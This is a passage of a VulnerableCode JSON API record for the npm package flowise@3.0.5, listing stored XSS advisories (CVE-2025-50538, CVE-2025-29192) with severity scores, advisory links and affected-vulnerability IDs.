"VCID-ywgu-76cy-uqe7" }, { "vulnerability": "VCID-zwna-stj5-3yhm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.8" } ], "aliases": [ "GHSA-4fr9-3x69-36wv" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zwz7-byj4-6qan" } ], "fixing_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212283?format=api", "vulnerability_id": "VCID-rkaz-75t9-r3gs", "summary": "Duplicate Advisory: Flowise is vulnerable to stored XSS via \"View Messages\" allows credential theft in FlowiseAI admin panel", "references": [ { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50538", "reference_id": "CVE-2025-50538", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50538" }, { "reference_url": "https://github.com/advisories/GHSA-7rgr-72hp-9wp3", "reference_id": "GHSA-7rgr-72hp-9wp3", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-7rgr-72hp-9wp3" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-964p-j4gg-mhwc", "reference_id": "GHSA-964p-j4gg-mhwc", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-964p-j4gg-mhwc" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/34083?format=api", "purl": "pkg:npm/flowise@3.0.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-39aw-3gc6-bkgb" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-488c-vrqu-f7hf" }, { "vulnerability": "VCID-5hdy-fsnn-qfgq" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-6ufs-d346-d7ev" }, { "vulnerability": "VCID-6wat-8akx-hycz" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-8vsg-mxay-gkf7" }, { "vulnerability": "VCID-9bht-svq8-87b4" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-abyp-yn76-1yfp" }, { "vulnerability": "VCID-affy-v76q-fub6" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dtss-epth-z7fh" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fje6-knjc-nfgf" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-g7y6-euhd-jqhh" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-jcze-eg2c-mkcf" }, { "vulnerability": "VCID-jmps-anck-eqdt" }, { "vulnerability": "VCID-k579-xd81-hqdu" }, { "vulnerability": "VCID-ksmv-s6c9-t7ap" }, { "vulnerability": "VCID-m3j3-4u39-euht" }, { "vulnerability": "VCID-n77p-4nu7-2yb4" }, { "vulnerability": "VCID-pg5c-6y4s-h3cq" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-qgs1-hazv-67b8" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-t839-eydz-1ud4" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-wt2v-e5sa-n3g8" }, { "vulnerability": "VCID-ywgu-76cy-uqe7" }, { "vulnerability": "VCID-zbrd-qdty-2bfs" }, { "vulnerability": "VCID-zwna-stj5-3yhm" }, { "vulnerability": "VCID-zwz7-byj4-6qan" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.5" } ], "aliases": [ "GHSA-7rgr-72hp-9wp3" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rkaz-75t9-r3gs" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212282?format=api", "vulnerability_id": "VCID-t5jg-qrw2-aqcv", "summary": "Duplicate Advisory: Flowise Stored XSS vulnerability through logs in chatbot", "references": [ { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-29192", "reference_id": "CVE-2025-29192", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-29192" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-7r4h-vmj9-wg42", "reference_id": "GHSA-7r4h-vmj9-wg42", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-7r4h-vmj9-wg42" }, { "reference_url": "https://github.com/advisories/GHSA-wq95-wr7m-26h4", "reference_id": "GHSA-wq95-wr7m-26h4", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-wq95-wr7m-26h4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/34083?format=api", "purl": "pkg:npm/flowise@3.0.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-39aw-3gc6-bkgb" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-488c-vrqu-f7hf" }, { "vulnerability": "VCID-5hdy-fsnn-qfgq" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-6ufs-d346-d7ev" }, { "vulnerability": "VCID-6wat-8akx-hycz" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-8vsg-mxay-gkf7" }, { "vulnerability": "VCID-9bht-svq8-87b4" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-abyp-yn76-1yfp" }, { "vulnerability": "VCID-affy-v76q-fub6" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dtss-epth-z7fh" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fje6-knjc-nfgf" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-g7y6-euhd-jqhh" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-jcze-eg2c-mkcf" }, { "vulnerability": "VCID-jmps-anck-eqdt" }, { "vulnerability": "VCID-k579-xd81-hqdu" }, { "vulnerability": "VCID-ksmv-s6c9-t7ap" }, { "vulnerability": "VCID-m3j3-4u39-euht" }, { "vulnerability": "VCID-n77p-4nu7-2yb4" }, { "vulnerability": "VCID-pg5c-6y4s-h3cq" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-qgs1-hazv-67b8" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-t839-eydz-1ud4" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-wt2v-e5sa-n3g8" }, { "vulnerability": "VCID-ywgu-76cy-uqe7" }, { "vulnerability": "VCID-zbrd-qdty-2bfs" }, { "vulnerability": "VCID-zwna-stj5-3yhm" }, { "vulnerability": "VCID-zwz7-byj4-6qan" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.5" } ], "aliases": [ "GHSA-wq95-wr7m-26h4" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-t5jg-qrw2-aqcv" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/108868?format=api", "vulnerability_id": "VCID-wg28-w8vn-ybb5", "summary": "Flowise before 3.0.5 allows XSS via a FORM element and an INPUT element when an admin views the chat log.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-29192", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.19091", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-29192" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/commit/9a06a85a8ddcbaeca1342827a5fea9087a587d97", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/commit/9a06a85a8ddcbaeca1342827a5fea9087a587d97" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/pull/4905", "reference_id": "4905", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-06T13:54:28Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/pull/4905" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-29192", "reference_id": "CVE-2025-29192", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-29192" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.5", "reference_id": "flowise%403.0.5", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-06T13:54:28Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.5" }, { "reference_url": "https://github.com/advisories/GHSA-7r4h-vmj9-wg42", "reference_id": "GHSA-7r4h-vmj9-wg42", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-7r4h-vmj9-wg42" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-7r4h-vmj9-wg42", "reference_id": "GHSA-7r4h-vmj9-wg42", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-06T13:54:28Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-7r4h-vmj9-wg42" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/34083?format=api", "purl": "pkg:npm/flowise@3.0.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-39aw-3gc6-bkgb" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-488c-vrqu-f7hf" }, { "vulnerability": "VCID-5hdy-fsnn-qfgq" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-6ufs-d346-d7ev" }, { "vulnerability": "VCID-6wat-8akx-hycz" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-8vsg-mxay-gkf7" }, { "vulnerability": "VCID-9bht-svq8-87b4" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-abyp-yn76-1yfp" }, { "vulnerability": "VCID-affy-v76q-fub6" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dtss-epth-z7fh" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fje6-knjc-nfgf" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-g7y6-euhd-jqhh" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-jcze-eg2c-mkcf" }, { "vulnerability": "VCID-jmps-anck-eqdt" }, { "vulnerability": "VCID-k579-xd81-hqdu" }, { "vulnerability": "VCID-ksmv-s6c9-t7ap" }, { "vulnerability": "VCID-m3j3-4u39-euht" }, { "vulnerability": "VCID-n77p-4nu7-2yb4" }, { "vulnerability": "VCID-pg5c-6y4s-h3cq" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-qgs1-hazv-67b8" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-t839-eydz-1ud4" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-wt2v-e5sa-n3g8" }, { "vulnerability": "VCID-ywgu-76cy-uqe7" }, { "vulnerability": "VCID-zbrd-qdty-2bfs" }, { "vulnerability": "VCID-zwna-stj5-3yhm" }, { "vulnerability": "VCID-zwz7-byj4-6qan" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.5" } ], "aliases": [ "CVE-2025-29192", "GHSA-7r4h-vmj9-wg42" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wg28-w8vn-ybb5" } ], "risk_score": "4.5", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.5" }